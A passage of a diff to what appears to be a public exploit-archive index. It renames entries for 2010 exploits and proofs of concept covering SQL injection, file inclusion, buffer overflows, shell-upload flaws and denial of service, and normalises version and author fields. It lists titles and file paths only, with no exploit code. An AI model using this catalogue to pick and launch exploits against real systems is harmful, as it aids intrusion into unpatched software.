PoC",2010-04-14,mr_me,windows,dos,0 +12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability",2010-04-15,"AnGrY BoY",php,webapps,0 12246,platforms/php/webapps/12246.txt,"Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability",2010-04-15,v3n0m,php,webapps,0 -12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX v4.0.0.5 NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 -12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX v4.0.0.5 NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 -12249,platforms/php/webapps/12249.txt,"60cycleCMS v2.5.2 (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability",2010-04-15,eidelweiss,php,webapps,0 -12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX v4.0.0.5 NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 +12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 +12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 +12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability",2010-04-15,eidelweiss,php,webapps,0 +12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0 12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0 12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0 @@ -11187,7 +11187,7 @@ id,file,description,date,author,platform,type,port 12259,platforms/php/dos/12259.php,"PHP 5.3.x DoS",2010-04-16,ITSecTeam,php,dos,0 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0 12261,platforms/windows/local/12261.rb,"Archive Searcher .zip Stack Overflow",2010-04-16,Lincoln,windows,local,0 -12262,platforms/php/webapps/12262.php,"ZykeCMS V1.1 (Auth Bypass) SQL Injection Vulnerability",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 +12262,platforms/php/webapps/12262.php,"ZykeCMS 1.1 - (Auth Bypass) SQL Injection Vulnerability",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 12263,platforms/multiple/remote/12263.txt,"Apache OFBiz SQL Remote Execution PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0 12264,platforms/multiple/remote/12264.txt,"Apache OFBiz FULLADMIN Creator PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0 12265,platforms/hardware/remote/12265.txt,"Unauthenticated File-system Access in Iomega Home Media Network Hard Drive v. 2.038 - 2.061",2010-04-16,fizix610,hardware,remote,0 @@ -11201,10 +11201,10 @@ id,file,description,date,author,platform,type,port 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 12276,platforms/php/webapps/12276.txt,"Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability",2010-04-18,eidelweiss,php,webapps,0 12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 (RFI/LFI) Multiple File Include Vulnerability",2010-04-18,cr4wl3r,php,webapps,0 -12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 SQL Injection Vulnerability",2010-04-18,indoushka,php,webapps,0 -12279,platforms/php/webapps/12279.txt,"eclime v1.1 ByPass / Create and Download Backup Vulnerability",2010-04-18,indoushka,php,webapps,0 +12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 SQL Injection Vulnerability",2010-04-18,"indoushka salah el ddine",php,webapps,0 +12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup Vulnerability",2010-04-18,"indoushka salah el ddine",php,webapps,0 12280,platforms/php/webapps/12280.txt,"dl_stats Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",php,webapps,0 -12282,platforms/php/webapps/12282.txt,"Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0 +12282,platforms/php/webapps/12282.txt,"Joomla Component Archery Scores (com_archeryscores) 1.0.6 - LFI Vulnerability",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0 12283,platforms/php/webapps/12283.txt,"Joomla Component ZiMB Comment com_zimbcomment Local File Inclusion Vulnerability",2010-04-18,AntiSecurity,php,webapps,0 12284,platforms/php/webapps/12284.txt,"Joomla Component ZiMB Manager com_zimbcore Local File Inclusion Vulnerability",2010-04-18,AntiSecurity,php,webapps,0 12285,platforms/php/webapps/12285.txt,"Joomla Component Gadget Factory com_gadgetfactory Local File Inclusion Vulnerability",2010-04-18,AntiSecurity,php,webapps,0 @@ -11223,18 +11223,18 @@ id,file,description,date,author,platform,type,port 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 12299,platforms/php/webapps/12299.txt,"Joomla Component GBU FACEBOOK SQL injection vulnerability",2010-04-19,kaMtiEz,php,webapps,0 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 -12302,platforms/windows/dos/12302.html,"HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC",2010-04-20,mr_me,windows,dos,0 +12302,platforms/windows/dos/12302.html,"HP Operations Manager <= 8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC",2010-04-20,mr_me,windows,dos,0 12303,platforms/php/webapps/12303.pl,"MusicBox v 3.3 SQL Injection Exploit",2010-04-20,Ctacok,php,webapps,0 -12304,platforms/multiple/remote/12304.txt,"MultiThreaded HTTP Server v1.1 Directory Traversal",2010-04-20,chr1x,multiple,remote,0 +12304,platforms/multiple/remote/12304.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal",2010-04-20,chr1x,multiple,remote,0 12305,platforms/php/webapps/12305.txt,"Joomla com_jnewspaper (cid) SQL Injection Vulnerability",2010-04-20,"Don Tukulesto",php,webapps,0 12306,platforms/php/webapps/12306.txt,"Joomla Component JTM Reseller SQL injection vulnerability",2010-04-20,kaMtiEz,php,webapps,0 -12308,platforms/windows/remote/12308.txt,"MultiThreaded HTTP Server v1.1 Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0 -12309,platforms/windows/remote/12309.txt,"Mongoose Web Server v2.8 Multiple Directory Traversal Exploits",2010-04-20,Dr_IDE,windows,remote,0 -12310,platforms/windows/remote/12310.txt,"Acritum Femitter v1.03 Directory Traversal Exploit",2010-04-20,Dr_IDE,windows,remote,0 +12308,platforms/windows/remote/12308.txt,"MultiThreaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0 +12309,platforms/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversal Exploits",2010-04-20,Dr_IDE,windows,remote,0 +12310,platforms/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal Exploit",2010-04-20,Dr_IDE,windows,remote,0 12312,platforms/windows/remote/12312.rb,"EasyFTP Server <= 1.7.0.2 CWD Buffer Overflow (Metasploit)",2010-04-20,"Paul Makowski",windows,remote,0 12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 (RFI/LFI) Multiple File Include Vulnerability",2010-04-20,cr4wl3r,php,webapps,0 12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 (.zip) Memory Corruption",2010-04-20,TecR0c,windows,dos,0 -12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) Upload Shell Vulnerability",2010-04-21,cyberlog,php,webapps,0 +12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Upload Shell Vulnerability",2010-04-21,Cyberlog,php,webapps,0 12316,platforms/php/webapps/12316.txt,"Joomla Component wmi (com_wmi) LFI Vulnerability",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0 12317,platforms/php/webapps/12317.txt,"Joomla Component OrgChart com_orgchart Local File Inclusion Vulnerability",2010-04-21,AntiSecurity,php,webapps,0 12318,platforms/php/webapps/12318.txt,"Joomla Component MMS Blog com_mmsblog Local File Inclusion Vulnerability",2010-04-21,AntiSecurity,php,webapps,0 @@ -11245,30 +11245,30 @@ id,file,description,date,author,platform,type,port 12324,platforms/multiple/dos/12324.py,"Multiple Browsers Audio Tag DoS Vulnerability",2010-04-21,"Chase Higgins",multiple,dos,0 12325,platforms/php/webapps/12325.txt,"Joomla Component com_portfolio Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0 12326,platforms/windows/local/12326.py,"ZipGenius zgtips.dll Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 -12329,platforms/asp/webapps/12329.txt,"User Invoices Persistent XSS Vulnerability in CactuShop",2010-04-21,7Safe,asp,webapps,0 -12330,platforms/php/webapps/12330.txt,"Multiple XSS in Apache OFBiz",2010-04-21,"Lucas Apa",php,webapps,0 -12331,platforms/windows/remote/12331.txt,"MultiThreaded HTTP Server v1.1 Directory Traversal",2010-04-20,Dr_IDE,windows,remote,0 +12329,platforms/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent XSS Vulnerability",2010-04-21,7Safe,asp,webapps,0 +12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple XSS",2010-04-21,"Lucas Apa",php,webapps,0 +12331,platforms/windows/remote/12331.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal",2010-04-20,Dr_IDE,windows,remote,0 12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 PWD Remote Exploit",2010-04-22,zombiefx,windows,remote,0 12333,platforms/php/webapps/12333.txt,"CmS (id) SQL Injection Vulnerability",2010-04-22,spykit,php,webapps,0 12334,platforms/linux/dos/12334.c,"OpenSSL remote DoS",2010-04-22,Andi,linux,dos,0 12336,platforms/windows/dos/12336.c,"Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 12337,platforms/windows/dos/12337.c,"Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 -12338,platforms/php/webapps/12338.txt,"SQL Injection in Cacti Version <= 0.8.7e",2010-04-22,"Nahuel Grisolia",php,webapps,0 -12339,platforms/php/webapps/12339.txt,"OS Command Injection in Cacti Version <= 0.8.7e",2010-04-22,"Nahuel Grisolia",php,webapps,0 -12340,platforms/php/webapps/12340.txt,"Vulnerability in Joomla Component com_caddy",2010-04-22,_SuBz3r0_,php,webapps,0 +12338,platforms/php/webapps/12338.txt,"Cacti Version <= 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 +12339,platforms/php/webapps/12339.txt,"Cacti Version <= 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 +12340,platforms/php/webapps/12340.txt,"Joomla Component com_caddy - Vulnerability",2010-04-22,_SuBz3r0_,php,webapps,0 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)",2010-04-22,LiquidWorm,windows,dos,0 12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC",2010-04-22,LiquidWorm,windows,local,0 12343,platforms/multiple/remote/12343.txt,"Apache Tomcat v. 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 information disclosure vulnerability",2010-04-22,"Deniz Cevik",multiple,remote,0 12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 (7D11) Model MB702LL Mobile Safari Denial-of-Service",2010-04-19,"Matthew Bergin",hardware,dos,0 -12345,platforms/php/webapps/12345.txt,"phpGreetCards v3.7 XSS Vulnerabilities",2010-04-22,Valentin,php,webapps,0 -12346,platforms/php/webapps/12346.txt,"AJ Matrix v3.1 (id) Multiple SQL Injection Vulnerability",2010-04-22,v3n0m,php,webapps,0 -12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart v1.0 (maincatid) SQL Injection Vulnerability",2010-04-22,v3n0m,php,webapps,0 +12345,platforms/php/webapps/12345.txt,"phpGreetCards 3.7 - XSS Vulnerabilities",2010-04-22,Valentin,php,webapps,0 +12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - (id) Multiple SQL Injection Vulnerability",2010-04-22,v3n0m,php,webapps,0 +12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection Vulnerability",2010-04-22,v3n0m,php,webapps,0 12350,platforms/php/webapps/12350.txt,"In-portal 5.0.3 Remote Arbitrary File Upload Exploit",2010-04-23,eidelweiss,php,webapps,0 12351,platforms/php/webapps/12351.txt,"Memorial Web Site Script (id) SQL Injection Vulnerability",2010-04-23,v3n0m,php,webapps,0 -12353,platforms/php/webapps/12353.txt,"EPay Enterprise v4.13 (cid) SQL Injection Vulnerability",2010-04-23,v3n0m,php,webapps,0 +12353,platforms/php/webapps/12353.txt,"EPay Enterprise 4.13 - (cid) SQL Injection Vulnerability",2010-04-23,v3n0m,php,webapps,0 12354,platforms/php/webapps/12354.pl,"NKINFOWEB SQL Injection Exploit",2010-04-23,d4rk-h4ck3r,php,webapps,0 12355,platforms/php/webapps/12355.pl,"Excitemedia CMS SQL Injection Vulnerability",2010-04-23,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -12356,platforms/windows/dos/12356.c,"CommView Version 6.1 (Build 636) Local Denial Of Service (BSOD)",2010-04-23,p4r4N0ID,windows,dos,0 +12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial Of Service (BSOD)",2010-04-23,p4r4N0ID,windows,dos,0 12358,platforms/php/webapps/12358.txt,"Memorial Web Site Script --> Reset Password & Insecure Cookie Handling",2010-04-23,"Chip D3 Bi0s",php,webapps,0 12359,platforms/php/webapps/12359.txt,"Memorial Web Site Script Multiple Arbitrary Delete Vuln",2010-04-23,"Chip D3 Bi0s",php,webapps,0 12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 (tempid) Remote SQL Injection Vulnerability",2010-04-23,v3n0m,php,webapps,0 @@ -11282,31 +11282,31 @@ id,file,description,date,author,platform,type,port 12370,platforms/php/webapps/12370.txt,"XSS and Authentication bypass in NCT Jobs Portal Script",2010-04-24,Sid3^effects,php,webapps,0 12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) Sql Injection",2010-04-24,"Islam DefenDers",php,webapps,0 12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 (que_id) SQL Injection Vulnerability",2010-04-24,v3n0m,php,webapps,0 -12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook v3.1.8 XSS Vulnerabilities",2010-04-24,Valentin,php,webapps,0 -12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP v1.2.8 XSS Vulnerability",2010-04-24,Valentin,php,webapps,0 +12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - XSS Vulnerabilities",2010-04-24,Valentin,php,webapps,0 +12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - XSS Vulnerability",2010-04-24,Valentin,php,webapps,0 12375,platforms/osx/dos/12375.c,"MacOS X 10.6 HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Remote Arbitrary File Upload Exploit",2010-04-24,eidelweiss,php,webapps,0 12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec Local File Inclusion Vulnerability",2010-04-25,R3VAN_BASTARD,php,webapps,0 -12379,platforms/windows/local/12379.php,"Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit",2010-04-25,mr_me,windows,local,0 +12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - (.zip) 0day stack buffer overflow PoC exploit",2010-04-25,mr_me,windows,local,0 12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 PASV BoF (SEH)",2010-04-25,zombiefx,windows,remote,0 12381,platforms/php/webapps/12381.php,"phpegasus (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0 -12382,platforms/multiple/dos/12382.txt,"Invision Power Board 0-day Denial of Service",2010-04-25,SeeMe,multiple,dos,0 -12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,indoushka,php,webapps,0 +12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service (0day)",2010-04-25,SeeMe,multiple,dos,0 +12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,"indoushka salah el ddine",php,webapps,0 12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0 12385,platforms/php/webapps/12385.html,"TR Forum 1.5 insert admin CSRF Vulnerability",2010-04-25,EL-KAHINA,php,webapps,0 -12386,platforms/php/webapps/12386.txt,"PHP Classifieds V6.09 E-mail Dump Vulnerability",2010-04-25,indoushka,php,webapps,0 +12386,platforms/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump Vulnerability",2010-04-25,"indoushka salah el ddine",php,webapps,0 12387,platforms/php/webapps/12387.sh,"WebEssence 1.0.2 Multiple Vulnerabilities",2010-04-25,"white_sheep, R00T_ATI and epicfail",php,webapps,0 -12388,platforms/windows/local/12388.rb,"WM Downloader v3.0.0.9 Buffer Overflow (Meta)",2010-04-25,Blake,windows,local,0 +12388,platforms/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Buffer Overflow (Meta)",2010-04-25,Blake,windows,local,0 12395,platforms/php/webapps/12395.txt,"2daybiz Advanced Poll Script XSS and Authentication Bypass",2010-04-26,Sid3^effects,php,webapps,0 12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 Local File Include Vulnerability",2010-04-26,cr4wl3r,php,webapps,0 12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-26,cr4wl3r,php,webapps,0 12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal index.php (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 12400,platforms/php/webapps/12400.txt,"Joomla Component com_joomradio SQL injection vulnerability",2010-04-26,Mr.tro0oqy,php,webapps,0 12401,platforms/multiple/dos/12401.html,"WebKit <= 532.5 Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 -12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability",2010-04-26,indoushka,php,webapps,0 -12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 v10.2 Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0 -12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 v4.5.1 Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0 -12406,platforms/windows/local/12406.py,"Avast! 4.7 aavmker4.sys privilege escalation",2010-04-27,"Matteo Memelli",windows,local,0 +12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability",2010-04-26,"indoushka salah el ddine",php,webapps,0 +12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0 +12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0 +12406,platforms/windows/local/12406.py,"Avast! 4.7 aavmker4.sys privilege escalation",2010-04-27,ryujin,windows,local,0 12407,platforms/php/webapps/12407.txt,"CMScout 2.08 SQL Injection Vulnerability",2010-04-26,"Dr.0rYX and Cr3w-DZ",php,webapps,0 12408,platforms/windows/dos/12408.pl,"Safari 4.0.5 (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload SQL Injection Vulnerability",2010-04-26,BILGE_KAGAN,php,webapps,0 @@ -11316,19 +11316,19 @@ id,file,description,date,author,platform,type,port 12414,platforms/php/webapps/12414.txt,"2daybiz Auction Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12415,platforms/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 Multiple Vulnerabilites",2010-04-27,ITSecTeam,php,webapps,0 -12417,platforms/windows/remote/12417.py,"Bigant Messenger <= v2.52 - (AntCore.dll) RegisterCom() Remote 0day Heap Overflow",2010-04-27,mr_me,windows,remote,0 -12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 Changer Login et Mot de Passe CSRF Vulnerability",2010-04-27,indoushka,php,webapps,0 -12420,platforms/php/webapps/12420.php,"Portaneo Portal v2.2.3 Remote Arbitrary File Upload Exploit",2010-04-27,eidelweiss,php,webapps,0 +12417,platforms/windows/remote/12417.py,"Bigant Messenger <= 2.52 - (AntCore.dll) RegisterCom() Remote 0day Heap Overflow",2010-04-27,mr_me,windows,remote,0 +12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 Changer Login et Mot de Passe CSRF Vulnerability",2010-04-27,"indoushka salah el ddine",php,webapps,0 +12420,platforms/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Remote Arbitrary File Upload Exploit",2010-04-27,eidelweiss,php,webapps,0 12421,platforms/php/webapps/12421.txt,"Help Center Live 2.0.6(module=helpcenter&file=) Local File Inclusion",2010-04-27,41.w4r10r,php,webapps,0 12422,platforms/windows/dos/12422.pl,"Acoustica v. 3.32 cd/dvd label maker .m3u PoC",2010-04-27,chap0,windows,dos,0 12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software SQL Injection Vunerability",2010-04-27,41.w4r10,php,webapps,0 -12424,platforms/asp/webapps/12424.txt,"Acart <= 2.0 Shopping Cart Software Backup Dump Vulnerability",2010-04-27,indoushka,asp,webapps,0 -12425,platforms/windows/dos/12425.html,"Webkit (Safari v4.0.5) blink tag Stack Exhaustion DoS",2010-04-27,Dr_IDE,windows,dos,0 +12424,platforms/asp/webapps/12424.txt,"Acart <= 2.0 Shopping Cart Software Backup Dump Vulnerability",2010-04-27,"indoushka salah el ddine",asp,webapps,0 +12425,platforms/windows/dos/12425.html,"Webkit (Safari 4.0.5) - Blink Tag Stack Exhaustion DoS",2010-04-27,Dr_IDE,windows,dos,0 12426,platforms/php/webapps/12426.txt,"Joomla Component Ultimate Portfolio com_ultimateportfolio Local File Inclusion Vulnerability",2010-04-27,AntiSecurity,php,webapps,0 12427,platforms/php/webapps/12427.txt,"Joomla Component NoticeBoard com_noticeboard Local File Inclusion Vulnerability",2010-04-27,AntiSecurity,php,webapps,0 12428,platforms/php/webapps/12428.txt,"Joomla Component SmartSite com_smartsite Local File Inclusion Vulnerability",2010-04-27,AntiSecurity,php,webapps,0 12429,platforms/php/webapps/12429.pl,"Joomla ABC Extension com_abc SQL Injection Exploit",2010-04-27,AntiSecurity,php,webapps,0 -12430,platforms/php/webapps/12430.txt,"Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0 +12430,platforms/php/webapps/12430.txt,"Joomla Component graphics (com_graphics) 1.0.6 - LFI Vulnerability",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0 12431,platforms/windows/dos/12431.html,"Webmoney Advisor ActiveX Remote DoS Exploit",2010-04-28,Go0o$E,windows,dos,0 12432,platforms/php/webapps/12432.txt,"Joomla JE Property Finder Component Upload Vulnerability",2010-04-28,Sid3^effects,php,webapps,0 12433,platforms/cgi/webapps/12433.py,"NIBE heat pump RCE exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 @@ -11343,45 +11343,45 @@ id,file,description,date,author,platform,type,port 12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 12443,platforms/php/webapps/12443.txt,"Modelbook (casting_view.php) SQL Injection Vulnerability",2010-04-28,v3n0m,php,webapps,0 12444,platforms/php/webapps/12444.txt,"PHP Video Battle SQL Injection Vulnerability",2010-04-28,v3n0m,php,webapps,0 -12445,platforms/php/webapps/12445.txt,"Authenication Bypass Vulnerability in Articles Directory",2010-04-29,Sid3^effects,php,webapps,0 -12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 Mullti Vulnerability",2010-04-29,indoushka,php,webapps,0 -12447,platforms/php/webapps/12447.txt,"XT-Commerce v1 Beta 1 => by Pass / Creat and Download Backup Vulnerability",2010-04-29,indoushka,php,webapps,0 -12448,platforms/php/webapps/12448.txt,"Upload Vulnerability and XSS in socialware V2.2",2010-04-29,Sid3^effects,php,webapps,0 -12449,platforms/php/webapps/12449.txt,"deV!L`z Clanportal V1.5 Mullti Vulnerability",2010-04-29,indoushka,php,webapps,0 +12445,platforms/php/webapps/12445.txt,"Articles Directory - Authenication Bypass Vulnerability",2010-04-29,Sid3^effects,php,webapps,0 +12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 Mullti Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0 +12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 => Pass / Creat and Download Backup Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0 +12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload Vulnerability and XSS",2010-04-29,Sid3^effects,php,webapps,0 +12449,platforms/php/webapps/12449.txt,"deV!L`z Clanportal 1.5 - Mullti Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0 12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 XSS Vulnerability",2010-04-29,"High-Tech Bridge SA",windows,webapps,0 -12451,platforms/php/webapps/12451.txt,"SQli Vulnerability in iScripts VisualCaster",2010-04-29,Sid3^effects,php,webapps,0 +12451,platforms/php/webapps/12451.txt,"iScripts VisualCaster - SQli Vulnerability",2010-04-29,Sid3^effects,php,webapps,0 12452,platforms/php/webapps/12452.txt,"TaskFreak 0.6.2 SQL Injection Vulnerability",2010-04-29,"Justin C. Klein Keane",php,webapps,0 -12453,platforms/php/webapps/12453.txt,"Zyke CMS V1.1 By pass Vulnerability",2010-04-29,"indoushka ",php,webapps,0 -12454,platforms/php/webapps/12454.txt,"Zyke CMS V1.0 Remote File Upload Vulnerability",2010-04-29,"indoushka ",php,webapps,0 -12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 Insecure crossdomain (XSS) Vulnerability",2010-04-29,indoushka,php,webapps,0 +12453,platforms/php/webapps/12453.txt,"Zyke CMS 1.1 - Bypass Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0 +12454,platforms/php/webapps/12454.txt,"Zyke CMS 1.0 - Remote File Upload Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0 +12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 Insecure crossdomain (XSS) Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0 12456,platforms/php/webapps/12456.txt,"chCounter indirect SQL Injection and XSS Vulnerabilities",2010-04-29,Valentin,php,webapps,0 12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit",2010-04-29,ITSecTeam,windows,dos,0 12458,platforms/php/webapps/12458.txt,"Scratcher (SQL/XSS) Multiple Remote Vulnerability",2010-04-29,cr4wl3r,php,webapps,0 12459,platforms/php/webapps/12459.txt,"EC21 Clone 3.0 (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"B2B Gold Script (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 -12461,platforms/php/webapps/12461.txt,"SQLi Vulnerability in JobPost",2010-04-30,Sid3^effects,php,webapps,0 -12462,platforms/php/webapps/12462.txt,"MSSQLi Vulnerability in AutoDealer Ver.1 and Ver.2",2010-04-30,Sid3^effects,php,webapps,0 -12463,platforms/php/webapps/12463.txt,"Multiple Vulnerability in New-CMS",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 -12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= v1.5.8 Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 +12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 +12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 & 2.0 - MSSQLi 